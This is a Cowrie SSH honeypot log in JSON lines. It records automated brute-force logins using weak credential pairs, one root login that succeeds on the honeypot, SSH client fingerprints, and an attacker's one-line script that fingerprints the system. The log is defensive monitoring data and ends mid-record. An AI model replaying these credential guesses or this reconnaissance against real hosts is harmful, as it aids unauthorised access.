{"eventid":"cowrie.login.failed","username":"test","password":"test","message":"login attempt [test/test] failed","sensor":"my-vps","timestamp":"2025-08-26T21:00:36.095886Z","src_ip":"212.227.235.229","session":"dc179bbe1cca"}
{"eventid":"cowrie.login.failed","username":"installer","password":"installer","message":"login attempt [installer/installer] failed","sensor":"my-vps","timestamp":"2025-08-26T21:00:36.811552Z","src_ip":"212.227.235.229","session":"059c6386a55f"}
{"eventid":"cowrie.session.closed","duration":"3.3","message":"Connection lost after 3.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:00:37.512691Z","src_ip":"212.227.235.229","session":"dc179bbe1cca"}
{"eventid":"cowrie.session.closed","duration":"107.4","message":"Connection lost after 107.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:00:38.065242Z","src_ip":"212.227.235.229","session":"059c6386a55f"}
{"eventid":"cowrie.session.connect","src_ip":"80.94.95.15","src_port":11674,"dst_ip":"1.2.3.4","dst_port":22,"session":"f63c04cd18e9","protocol":"ssh","message":"New connection: 80.94.95.15:11674 (1.2.3.4:22) [session: f63c04cd18e9]","sensor":"my-vps","timestamp":"2025-08-26T21:00:49.575838Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-26T21:00:49.576573Z","src_ip":"80.94.95.15","session":"f63c04cd18e9"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-26T21:00:49.722817Z","src_ip":"80.94.95.15","session":"f63c04cd18e9"}
{"eventid":"cowrie.login.failed","username":"user","password":"josh","message":"login attempt [user/josh] failed","sensor":"my-vps","timestamp":"2025-08-26T21:00:50.387372Z","src_ip":"80.94.95.15","session":"f63c04cd18e9"}
{"eventid":"cowrie.login.failed","username":"user","password":"jimbob","message":"login attempt [user/jimbob] failed","sensor":"my-vps","timestamp":"2025-08-26T21:00:51.483640Z","src_ip":"80.94.95.15","session":"f63c04cd18e9"}
{"eventid":"cowrie.login.failed","username":"user","password":"jimbo","message":"login attempt [user/jimbo] failed","sensor":"my-vps","timestamp":"2025-08-26T21:00:52.580189Z","src_ip":"80.94.95.15","session":"f63c04cd18e9"}
{"eventid":"cowrie.login.failed","username":"user","password":"janine","message":"login attempt [user/janine] failed","sensor":"my-vps","timestamp":"2025-08-26T21:00:53.665399Z","src_ip":"80.94.95.15","session":"f63c04cd18e9"}
{"eventid":"cowrie.login.failed","username":"user","password":"jackal","message":"login attempt [user/jackal] failed","sensor":"my-vps","timestamp":"2025-08-26T21:00:55.345765Z","src_ip":"80.94.95.15","session":"f63c04cd18e9"}
{"eventid":"cowrie.session.closed","duration":"6.9","message":"Connection lost after 6.9 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:00:56.431031Z","src_ip":"80.94.95.15","session":"f63c04cd18e9"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":60904,"dst_ip":"1.2.3.4","dst_port":22,"session":"a5b36f6eeb2a","protocol":"ssh","message":"New connection: 212.227.235.229:60904 (1.2.3.4:22) [session: a5b36f6eeb2a]","sensor":"my-vps","timestamp":"2025-08-26T21:00:57.129087Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T21:01:00.142087Z","src_ip":"212.227.235.229","session":"a5b36f6eeb2a"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-26T21:01:00.143101Z","src_ip":"212.227.235.229","session":"a5b36f6eeb2a"}
{"eventid":"cowrie.login.success","username":"root","password":"321","message":"login attempt [root/321] succeeded","sensor":"my-vps","timestamp":"2025-08-26T21:01:05.246040Z","src_ip":"212.227.235.229","session":"a5b36f6eeb2a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":51824,"dst_ip":"1.2.3.4","dst_port":22,"session":"652e5614a417","protocol":"ssh","message":"New connection: 212.227.125.160:51824 (1.2.3.4:22) [session: 652e5614a417]","sensor":"my-vps","timestamp":"2025-08-26T21:01:06.942078Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:01:06.987701Z","src_ip":"212.227.125.160","session":"652e5614a417"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T21:01:07.907950Z","src_ip":"212.227.235.229","session":"a5b36f6eeb2a"}
{"eventid":"cowrie.command.input","input":"uname=$(uname -s -v -n -m 2>/dev/null);; \t\tarch=$(uname -m 2>/dev/null);; \t\tuptime=$(awk '{u=int($1);d=int(u/86400);h=int((u%86400)/3600);m=int((u%3600)/60);s=\"\";if(d>0)s=s d\"d\";if(h>0){if(s!=\"\")s=s\", \";s=s h\"h\"}if(m>0||s==\"\"){if(s!=\"\")s=s\", \";s=s m\"m\"}print s}' /proc/uptime 2>/dev/null);; \t\t[ -z \"$uptime\" ] && secondsStr=$(cat /proc/uptime | cut -d' ' -f1 | cut -d. -f1) && [ -n \"$secondsStr\" ] && seconds=$((secondsStr)) && d=$((seconds/86400)) && h=$(( (seconds%86400)/3600 )) && m=$(( (seconds%3600)/60 )) && uptime=\"\" && [ $d -gt 0 ] && uptime=\"${uptime}${d}d\" && [ $h -gt 0 ] && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${h}h\"; } && { [ $m -gt 0 ] || [ -z \"$uptime\" ]; } && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${m}m\"; };; \t\tcpus=$( (nproc || grep -c \"^processor\" /proc/cpuinfo) 2>/dev/null | head -1);; \t\tcpu_model=$( (grep -m1 \"model name\" /proc/cpuinfo | cut -d: -f2 | sed 's/^ //;s/ *$//' || lscpu | grep -m1 \"Model name\" | cut -d: -f2 | sed 's/^ //;s/ *$//') 2>/dev/null);; \t\tgpu_info=$( (lspci | grep -i vga; lspci | grep -i nvidia) 2>/dev/null | head -n5);; \t\tcat_help=$((cat --help 2>&1 | tr '\\n' ' ') || cat --help 2>&1);; \t\tls_help=$((ls --help 2>&1 | tr '\\n' ' ') || ls --help 2>&1);; \t\tlast_output=$((last | tail -n 10) || last);; \t\techo \"UNAME:$uname\";; \t\techo \"ARCH:$arch\";; \t\techo \"UPTIME:$uptime\";; \t\techo \"CPUS:$cpus\";; \t\techo \"CPU_MODEL:$cpu_model\";; \t\techo \"GPU:$gpu_info\";; \t\techo \"CAT_HELP:$cat_help\";; \t\techo \"LS_HELP:$ls_help\";; \t\techo \"LAST:$last_output\";","message":"CMD: uname=$(uname -s -v -n -m 2>/dev/null);; \t\tarch=$(uname -m 2>/dev/null);; \t\tuptime=$(awk '{u=int($1);d=int(u/86400);h=int((u%86400)/3600);m=int((u%3600)/60);s=\"\";if(d>0)s=s d\"d\";if(h>0){if(s!=\"\")s=s\", \";s=s h\"h\"}if(m>0||s==\"\"){if(s!=\"\")s=s\", \";s=s m\"m\"}print s}' /proc/uptime 2>/dev/null);; \t\t[ -z \"$uptime\" ] && secondsStr=$(cat /proc/uptime | cut -d' ' -f1 | cut -d. -f1) && [ -n \"$secondsStr\" ] && seconds=$((secondsStr)) && d=$((seconds/86400)) && h=$(( (seconds%86400)/3600 )) && m=$(( (seconds%3600)/60 )) && uptime=\"\" && [ $d -gt 0 ] && uptime=\"${uptime}${d}d\" && [ $h -gt 0 ] && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${h}h\"; } && { [ $m -gt 0 ] || [ -z \"$uptime\" ]; } && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${m}m\"; };; \t\tcpus=$( (nproc || grep -c \"^processor\" /proc/cpuinfo) 2>/dev/null | head -1);; \t\tcpu_model=$( (grep -m1 \"model name\" /proc/cpuinfo | cut -d: -f2 | sed 's/^ //;s/ *$//' || lscpu | grep -m1 \"Model name\" | cut -d: -f2 | sed 's/^ //;s/ *$//') 2>/dev/null);; \t\tgpu_info=$( (lspci | grep -i vga; lspci | grep -i nvidia) 2>/dev/null | head -n5);; \t\tcat_help=$((cat --help 2>&1 | tr '\\n' ' ') || cat --help 2>&1);; \t\tls_help=$((ls --help 2>&1 | tr '\\n' ' ') || ls --help 2>&1);; \t\tlast_output=$((last | tail -n 10) || last);; \t\techo \"UNAME:$uname\";; \t\techo \"ARCH:$arch\";; \t\techo \"UPTIME:$uptime\";; \t\techo \"CPUS:$cpus\";; \t\techo \"CPU_MODEL:$cpu_model\";; \t\techo \"GPU:$gpu_info\";; \t\techo \"CAT_HELP:$cat_help\";; \t\techo \"LS_HELP:$ls_help\";; \t\techo \"LAST:$last_output\";","sensor":"my-vps","timestamp":"2025-08-26T21:01:07.908645Z","src_ip":"212.227.235.229","session":"a5b36f6eeb2a"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -m 2 > /dev/null","message":"CMD: uname -s -v -n -m 2 > /dev/null","sensor":"my-vps","timestamp":"2025-08-26T21:01:07.909859Z","src_ip":"212.227.235.229","session":"a5b36f6eeb2a"}
{"eventid":"cowrie.command.input","input":"uname -m 2 > /dev/null","message":"CMD: uname -m 2 > /dev/null","sensor":"my-vps","timestamp":"2025-08-26T21:01:07.910869Z","src_ip":"212.227.235.229","session":"a5b36f6eeb2a"}
{"eventid":"cowrie.command.input","input":"awk {u=int($1","message":"CMD: awk {u=int($1","sensor":"my-vps","timestamp":"2025-08-26T21:01:07.911826Z","src_ip":"212.227.235.229","session":"a5b36f6eeb2a"}
{"eventid":"cowrie.command.input","input":"cat /proc/uptime | cut -d -f1 | cut -d. -f1","message":"CMD: cat /proc/uptime | cut -d -f1 | cut -d. -f1","sensor":"my-vps","timestamp":"2025-08-26T21:01:07.912599Z","src_ip":"212.227.235.229","session":"a5b36f6eeb2a"}
{"eventid":"cowrie.command.failed","input":"cat /proc/uptime | cut -d -f1 | cut -d. -f1","message":"Command not found: cat /proc/uptime | cut -d -f1 | cut -d. -f1","sensor":"my-vps","timestamp":"2025-08-26T21:01:07.913374Z","src_ip":"212.227.235.229","session":"a5b36f6eeb2a"}
{"eventid":"cowrie.command.input","input":"(secondsStr","message":"CMD: (secondsStr","sensor":"my-vps","timestamp":"2025-08-26T21:01:07.914084Z","src_ip":"212.227.235.229","session":"a5b36f6eeb2a"}
{"eventid":"cowrie.command.input","input":"(seconds/86400","message":"CMD: (seconds/86400","sensor":"my-vps","timestamp":"2025-08-26T21:01:07.914463Z","src_ip":"212.227.235.229","session":"a5b36f6eeb2a"}
{"eventid":"cowrie.command.input","input":"( (seconds%86400","message":"CMD: ( (seconds%86400","sensor":"my-vps","timestamp":"2025-08-26T21:01:07.914850Z","src_ip":"212.227.235.229","session":"a5b36f6eeb2a"}
{"eventid":"cowrie.command.input","input":"(seconds%86400","message":"CMD: (seconds%86400","sensor":"my-vps","timestamp":"2025-08-26T21:01:07.915323Z","src_ip":"212.227.235.229","session":"a5b36f6eeb2a"}
{"eventid":"cowrie.command.input","input":"( (seconds%3600","message":"CMD: ( (seconds%3600","sensor":"my-vps","timestamp":"2025-08-26T21:01:07.915844Z","src_ip":"212.227.235.229","session":"a5b36f6eeb2a"}
{"eventid":"cowrie.command.input","input":"(seconds%3600","message":"CMD: (seconds%3600","sensor":"my-vps","timestamp":"2025-08-26T21:01:07.916343Z","src_ip":"212.227.235.229","session":"a5b36f6eeb2a"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","shasum":"1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","destfile":"/dev/null","message":"Saved redir contents with SHA-256 1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057 to var/lib/cowrie/downloads/1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","sensor":"my-vps","timestamp":"2025-08-26T21:01:09.130368Z","src_ip":"212.227.235.229","session":"a5b36f6eeb2a"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/ca88d8e2c0cfe079cce0e55390ff79932c81d831016d8b2dfa21f7db9a052f8c","size":74,"shasum":"ca88d8e2c0cfe079cce0e55390ff79932c81d831016d8b2dfa21f7db9a052f8c","duplicate":true,"duration":"1.2","message":"Closing TTY Log: var/lib/cowrie/tty/ca88d8e2c0cfe079cce0e55390ff79932c81d831016d8b2dfa21f7db9a052f8c after 1.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:01:09.131283Z","src_ip":"212.227.235.229","session":"a5b36f6eeb2a"}
{"eventid":"cowrie.session.closed","duration":"12.0","message":"Connection lost after 12.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:01:09.133277Z","src_ip":"212.227.235.229","session":"a5b36f6eeb2a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":47598,"dst_ip":"1.2.3.4","dst_port":22,"session":"52d2849d7bbd","protocol":"ssh","message":"New connection: 212.227.235.229:47598 (1.2.3.4:22) [session: 52d2849d7bbd]","sensor":"my-vps","timestamp":"2025-08-26T21:01:34.271502Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-26T21:01:34.614804Z","src_ip":"212.227.235.229","session":"52d2849d7bbd"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-26T21:01:34.817368Z","src_ip":"212.227.235.229","session":"52d2849d7bbd"}
{"eventid":"cowrie.login.failed","username":"admin","password":"0l0ctyQh243O63uD","message":"login attempt [admin/0l0ctyQh243O63uD] failed","sensor":"my-vps","timestamp":"2025-08-26T21:01:36.278617Z","src_ip":"212.227.235.229","session":"52d2849d7bbd"}
{"eventid":"cowrie.session.closed","duration":"3.3","message":"Connection lost after 3.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:01:37.540674Z","src_ip":"212.227.235.229","session":"52d2849d7bbd"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":57842,"dst_ip":"1.2.3.4","dst_port":22,"session":"186dbb51bfa0","protocol":"ssh","message":"New connection: 212.227.235.229:57842 (1.2.3.4:22) [session: 186dbb51bfa0]","sensor":"my-vps","timestamp":"2025-08-26T21:01:41.877555Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-26T21:01:41.934574Z","src_ip":"212.227.235.229","session":"186dbb51bfa0"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-26T21:01:42.148694Z","src_ip":"212.227.235.229","session":"186dbb51bfa0"}
{"eventid":"cowrie.login.failed","username":"user","password":"1234","message":"login attempt [user/1234] failed","sensor":"my-vps","timestamp":"2025-08-26T21:01:44.954621Z","src_ip":"212.227.235.229","session":"186dbb51bfa0"}
{"eventid":"cowrie.session.closed","duration":"5.5","message":"Connection lost after 5.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:01:47.351872Z","src_ip":"212.227.235.229","session":"186dbb51bfa0"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":34984,"dst_ip":"1.2.3.4","dst_port":22,"session":"d6f3700ee419","protocol":"ssh","message":"New connection: 212.227.235.229:34984 (1.2.3.4:22) [session: d6f3700ee419]","sensor":"my-vps","timestamp":"2025-08-26T21:01:54.969198Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-26T21:01:54.977719Z","src_ip":"212.227.235.229","session":"d6f3700ee419"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh